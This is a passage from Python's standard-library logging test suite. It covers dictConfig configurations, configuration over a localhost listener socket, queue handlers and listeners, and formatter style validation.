'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn,
"encoding": "utf-8",
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
threading_helper.join_thread(t)
@support.requires_working_socket()
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@support.requires_working_socket()
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@support.requires_working_socket()
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
def test_config_callable_filter_works(self):
def filter_(_):
return 1
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_config_filter_works(self):
filter_ = logging.Filter("spam.eggs")
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_config_filter_method_works(self):
class FakeFilter:
def filter(self, _):
return 1
filter_ = FakeFilter()
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_invalid_type_raises(self):
class NotAFilter: pass
for filter_ in [None, 1, NotAFilter()]:
self.assertRaises(
ValueError,
self.apply_config,
{"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}}
)
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class AssertErrorMessage:
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises((), *args, **kwargs)
except exception as e:
self.assertEqual(message, str(e))
class FormatterTest(unittest.TestCase, AssertErrorMessage):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
'custom': {
'custom': 1234
}
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
